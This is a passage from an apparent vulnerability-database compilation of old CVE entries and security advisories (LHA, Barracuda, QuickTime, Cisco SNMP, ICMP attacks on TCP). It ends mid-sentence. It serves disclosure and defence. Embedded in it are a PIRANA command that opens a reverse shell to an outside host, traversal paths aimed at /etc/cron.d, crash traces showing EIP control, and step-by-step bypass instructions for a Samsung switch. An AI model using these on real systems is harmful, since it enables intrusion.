VARIoT IoT vulnerabilities database

PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc. Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges

Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. **NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. **Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. These vulnerabilities are related to: SA11510 SA19002 Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------ LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal) * DESCRIPTION * LHa is a console-based program for packing and unpacking LHarc archives. It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD. * OVERVIEW * LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough. By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture: $ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $ b) two directory traversal problems LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil". * ATTACHED FILES * I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives. * TIMELINE * 18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory // Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/ ------------------------------------------------------------------------ . TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow SECUNIA ADVISORY ID: SA19002 VERIFY ADVISORY: http://secunia.com/advisories/19002/ CRITICAL: Moderately critical IMPACT: DoS, System access WHERE: >From remote SOFTWARE: zoo 2.x http://secunia.com/product/8297/ DESCRIPTION: Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive). The vulnerability has been confirmed in version 2.10. Other versions may also be affected. SOLUTION: Restrict use to trusted ZOO archives. PROVIDED AND/OR DISCOVERED BY: Jean-S\xe9bastien Guay-Leroux ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Topic: Barracuda LHA archiver security bug leads to remote compromise Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045 Credits: Jean-S\xe9bastien Guay-Leroux CVE ID: CVE-2004-0234 I. BACKGROUND The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection: * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service II. DESCRIPTION When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program. Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bugs, you can consult OSVDB #5753 and #5754 . III. IMPACT Gain shell access to the remote Barracuda Spam Firewall IV. PROOF OF CONCEPT Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1 V. SOLUTION Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006. They also published an official patch in firmware #3.3.03.022, available April 3rd 2006. It is recommended to update to firmware #3.3.03.022 . VI. CREDITS Ulf Harnhammar who found the original LHA flaw. Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework. VII. REFERENCES http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234 VIII. HISTORY 2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-24 : Problem fixed 2006-04-03 : Advisory disclosed to public

Integer overflow in Apple QuickTime (QuickTime.qts) before 6.5.1 allows attackers to execute arbitrary code via a large "number of entries" field in the sample-to-chunk table data for a .mov movie file, which leads to a heap-based buffer overflow. apple's QuickTime Exists in unspecified vulnerabilities.None. This issue can be triggered by a malformed .mov file and is reported to be exploitable to execute arbitrary code on Microsoft Windows platforms. This issue could also cause the player to crash on other platforms. Conflicting information has been released by the vendor that suggests that this issue will only result in a denial of service on Mac OS X. Apple QuickTime (QuickTime.qts) Heap Overflow Release Date: May 02, 2004 Date Reported: February 18, 2004 Severity: High (Code Execution) Vendor: Apple Systems Affected: Apple QuickTime 6.5 Apple iTunes 4.2.0.72 Description: The Apple QuickTime media player is used for playing, interacting with or viewing video, audio, VR or graphics files. Many popular web browsers, media players, and other applications use their libraries to play various QuickTime movie formats through their applications. The vulnerability allows a remote attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code within the SYSTEM context. This specific flaw exists within the QuickTime.qts file which many applications access QuickTime's functionality through. By specially crafting atoms within a movie file, a direct heap overwrite is triggered, and reliable code execution is then possible. Technical Details: The code in QuickTime.qts responsible for copying Sample-to-Chunk table entries from the 'stsc' atom data in a QuickTime-format movie into an array allocated on the heap. According to developer.apple.com, the format of the Sample-to-Chunk atom is as follows: Offset Type Description ------- ------- -------------------------------- 0000h DWORD atom size 0004h DWORD atom type tag ('stsc') 0008h BYTE version 0009h BYTE[3] flags 000Ch DWORD number of entries 0010h ... sample-to-chunk table data The heap block intended to hold the sample-to-chunk table data is allocated with a size equal to (number_of_entries + 2) * 16. By supplying the "number of entries" field with the value 0x0FFFFFFE or greater, an absolutely classic integer overflow results that causes an insufficiently-sized heap block to be allocated, resulting in an equally classic complete heap memory overwrite. It is difficult to express just how textbook this vulnerability scenario really is. Successful exploitation of the vulnerability is self-evident, and therefore no further discussion is warranted. It is our sincere hope that the vendor will make an earnest effort to increase the maturity of its security response capabilities, so that researchers will be encouraged to continue to work with them amicably on future security issues. Apple is doing a disservice to its customers by incorrectly labeling this vulnerability as a "crash bug" rather than stating correctly that attackers can compromise systems running the affected Apple software. References: QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CAN-2004-0431. Credit: Karl Lynn Additional Research: Derek Soeder Greetings: Riley Hassell, Fuzen, Cubby, the ladies in the band MudBath, Zoe bird, Michelle L., and of course the entire staff at eEye. Copyright (c) 1998-2004 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Feedback Please send suggestions, updates, and comments to: eEye Digital Security http://www.eEye.com info@eEye.com

GUI overlay vulnerability in the Java API in Siemens S55 cellular phones allows remote attackers to send unauthorized SMS messages by overlaying a confirmation message with a malicious message. Siemens S55 is a mobile phone.  Siemens S55 has a race condition error when validating SMS messages.  No detailed vulnerability details are provided at this time. Reportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability

Samsung SmartEther SS6215S switch, and possibly other Samsung switches, allows remote attackers and local users to gain administrative access by providing the admin username followed by a password that is the maximum allowed length, then pressing the enter key after the resulting error message. When accessing a Samsung SmartEther switch, via the telnet service or serial connection, authentication is required and the user is presented with a logon screen. It has been reported that it is possible to bypass this authentication procedure. An attacker may potentially exploit this condition to, for example, modify static MAC address mapping and perhaps enable man-in-the-middle style attacks. Other attacks are certainly possible. Samsung SmartEther SS6215S is a network switch. When connecting to a Samsung SmartEther switch, enter the user name \"admin\", enter the longest combination of characters in the password field (unable to enter) as the password data, and then press Enter, although it will prompt that the password does not match, but into the system

SQL injection vulnerability in modules.php in PHP-Nuke Video Gallery Module 0.1 Beta 5 allows remote attackers to execute arbitrary SQL code via the (1) clipid or (2) catid parameters in a viewclip, viewcat, or voteclip action. This is due to a failure of the application to properly sanitize user-supplied input prior to using it in an SQL query. These issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation

The NAT implementation in Zonet ZSR1104WE Wireless Router Runtime Code Version 2.41 converts IP addresses of inbound connections to the IP address of the router, which allows remote attackers to bypass intended security restrictions. A vulnerability has been reported to affect the implementation of NAT for the ZSR1104WE model Zonet Wireless Router. NAT for the wireless interface on the ZSR1104WE appliance is reported to modify IP data so that on the internal network, the origin address of forwarded traffic is that of the affected appliance. This issue may render the implementation of access controls on an internal host impossible. Zonet Wireless Router is a wireless access device. No detailed vulnerability details are currently available

Buffer overflow in Serv-U FTP server before 5.0.0.6 allows remote attackers to cause a denial of service (crash) via a long -l parameter, which triggers an out-of-bounds read. Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input. Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed

Cisco Internetwork Operating System (IOS) 12.0S through 12.3T attempts to process SNMP solicited operations on improper ports (UDP 162 and a randomly chosen UDP port), which allows remote attackers to cause a denial of service (device reload and memory corruption). Sustained exploitation of this vulnerability could lead to a denial of service condition affect a large segment of the Internet community. / Router disrupts service operation (DoS) It may be in a state. This is caused by a design error that causes memory corruption in the affected system under certain circumstances. The denial of service is due to a corruption of memory in the affected device. As a result, there may be other consequences, such as code execution. This has not been confirmed by Cisco. Cisco IOS is a very widely deployed network operating system. Many Cisco devices run IOS. Specially constructed malformed SNMPv1 and SNMPv2 can trigger this vulnerability, and more dangerously any SNMPv3 "talk" operation detected on such ports can cause memory corruption that overloads the device, resulting in a denial of service. This vulnerability is distinct from the vulnerability described in US-CERT Technical Alert TA04-111A issued earlier today. Cisco has published an advisory about this distinct SNMP issue at the following location: <http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml> I. Description The Simple Network Management Protocol (SNMP) is a widely deployed protocol that is commonly used to monitor and manage network devices. There are several types of SNMP messages that are used to request information or configuration changes, respond to requests, enumerate SNMP objects, and send both solicited and unsolicited alerts. These messages use UDP to communicate network information between SNMP agents and managers. This may potentially cause the device to reload. Typically, ports 161/udp and 162/udp are used during SNMP operations to communicate. While SNMPv1 and SNMPv2c formatted messages can trigger this vulnerability, the greatest risk is exposed when any SNMPv3 solicited operation is sent to a vulnerable port. Cisco notes in their advisory: "SNMPv1 and SNMPv2c solicited operations to the vulnerable ports will perform an authentication check against the SNMP community string, which may be used to mitigate attacks. Through best practices of hard to guess community strings and community string ACLs, this vulnerability may be mitigated for both SNMPv1 and SNMPv2c. However, any SNMPv3 solicited operation to the vulnerable ports will reset the device. If configured for SNMP, all affected versions will process SNMP version 1, 2c and 3 operations." Cisco is tracking this issue as CSCed68575. US-CERT is tracking this issue as VU#162451. II. Impact A remote, unauthenticated attacker could cause the vulnerable device to reload. III. System managers are encouraged to upgrade to one of the non-vulnerable releases. For additional information regarding availability of repaired releases, please refer to the "Software Versions and Fixes" section of the Cisco Security Advisory. <http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml> Workarounds Cisco recommends a number of workarounds, including disabling SNMP processing on affected devices. For a complete list of workarounds, see the Cisco Security Advisory. Appendix A. Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to US-CERT, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Cisco has published their advisory at the following location: <http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml> _________________________________________________________________ US-CERT thanks Cisco Systems for notifying us about this problem. _________________________________________________________________ Feedback can be directed to the authors: Jeff Havrilla, Shawn Hernan, Damon Morda The latest version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA04-111B.html> _________________________________________________________________ Copyright 2004 Carnegie Mellon University. Terms of use: <http://www.us-cert.gov/legal.html> Revision History April 20, 2004: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFAhdSYXlvNRxAkFWARAqPXAJ98/hPua542rVKLAgmOVFRJEbLgHACgsBYS vP+68misX1RV+A2fWyU2NQA= =jID6 -----END PGP SIGNATURE-----

The original design of TCP does not check that the TCP sequence number in an ICMP error message is within the range of sequence numbers for data that has been sent but not acknowledged (aka "TCP sequence number checking"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues

Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (network throughput reduction for TCP connections) via a blind throughput-reduction attack using spoofed Source Quench packets, aka the "ICMP Source Quench attack." NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. In multiple vendor products TCP The implementation of ICMP Included in error message IP Address and TCP There is a flaw that only validates the port and does not check that the sequence number is in the proper range. This ICMP source quench Established by processing error messages TCP There is a vulnerability that reduces connection throughput. The vulnerability is ICMP Vulnerabilities resulting from message processing (CVE-2004-0790, CVE-2004-0791, CVE-2004-1060) Out of CVE-2004-0791 Vulnerability published as. TCP Due to vulnerabilities that affect implementation, a wide range of products are affected by these vulnerabilities. For more information, NISCC-532967 (JVN) , NISCC Advisory 532967/NISCC/ICMP (CPNI Advisory 00303) Please check also.Intentionally created fraud ICMP By processing error messages TCP Connection is reset, resulting in service disruption (DoS) It can cause a condition. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 HP SECURITY BULLETIN HPSBUX01164 REVISION: 4 SSRT4884 rev.4 - HP-UX TCP/IP Remote Denial of Service (DoS) NOTICE: There are no restrictions for distribution of this Security Bulletin provided that it remains complete and intact. The information in this Security Bulletin should be acted upon as soon as possible. INITIAL RELEASE: 10 July 2005 POTENTIAL SECURITY IMPACT: Remote Denial of Service (DoS) SOURCE: Hewlett-Packard Company HP Software Security Response Team VULNERABILITY SUMMARY: A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). REFERENCES: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.04, B.11.11, B.11.22, B.11.23 running TCP/IP. HP-UX B.11.11 and B.11.23 running TOUR (Transport Optional Upgrade Release). BACKGROUND: AFFECTED VERSIONS HP-UX B.11.22 HP-UX B.11.00 ============= Networking.NET2-KRN action: set ip_pmtu_strategy= 0 and either install binary files or filter ICMP HP-UX B.11.11 ============= Networking.NET2-KRN action: set ip_pmtu_strategy= 0 and install PHNE_33159 HP-UX B.11.23 ============= Networking.NET2-KRN ->action: set ip_pmtu_strategy= 0 and install PHNE_32606 HP-UX B.11.11 HP-UX B.11.23 ============= TOUR_PRODUCT.T-NET2-KRN action: set ip_pmtu_strategy= 0 and filter ICMP HP-UX B.11.04 ============= Networking.NET2-KRN action: set ip_pmtu_strategy= 0 and filter ICMP END AFFECTED VERSIONS Note: The latest TOUR (Transport Optional Upgrade Release), version 2.4, is available on B.11.11 only. The latest Transport Functionality is available to B.11.23 customers in the HP-UX 11i v2 September 2004 release. Customers using TOUR on B.11.23 can apply the workaround (set ip_pmtu_strategy= 0 and filter ICMP) or upgrade to the HP-UX 11i v2 September 2004 release. After upgrading the action for B.11.23 Networking.NET2-KRN listed above should be implemented. <http://www.uniras.gov.uk/niscc/docs/al-20050412-00308.html? lang=en> There are three issues reported in NISCC VU#532967: CVE number: CAN-2004-0790 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790> CVE number: CAN-2004-0791 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791> CVE number: CAN-2004-1060 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060> Workarounds are available for all three of these issues. Until binary files are available for B.11.04 the workarounds should be used. ->Binary files are available for CAN-2004-0790 and CAN-2004-0791 for HP-UX B.11.00 and B.11.22. Since PHNE_33159 is now available for B.11.11 the preliminary binary files for B.11.11 have been removed from the ftp site. ->Since PHNE_32606 is now available for B.11.23 the preliminary binary files for B.11.23 have been removed from the ftp site. Note: If the TOUR (Transport Optional Upgrade Release) product is installed the binary files cannot be used. Until the TOUR product is revised there are several options: B.11.11 1. Use the workarounds. or 2. Remove TOUR and install the binary files. B.11.23 1. Use the workarounds. or 2. Upgrade to the HP-UX 11i v2 September 2004 release and install the binary files. TOUR(Transport Optional Upgrade Release) is available from <http://www.hp.com/go/softwaredepot>. Workaround for CAN-2004-1060 may not be necessary. =================================== Although changes in the binary files and patches for CAN-2004-0790 and CAN-2004-0791 do not prevent the exploit of CAN-2004-1060, they do make it less likely to succeed. The sequence number check suggested in section 5.1 of <http://www.ietf.org/internet-drafts/ draft-gont-tcpm-icmp-attacks-03.txt> has been implemented. Customers should consider whether this check reduces the risk of the exploit to the point that setting ip_pmtu_strategy=0 is not required. If the workaround for CAN-2004-1060 is to be used, please note the following: ================================================= HPSBUX01137 recommends setting 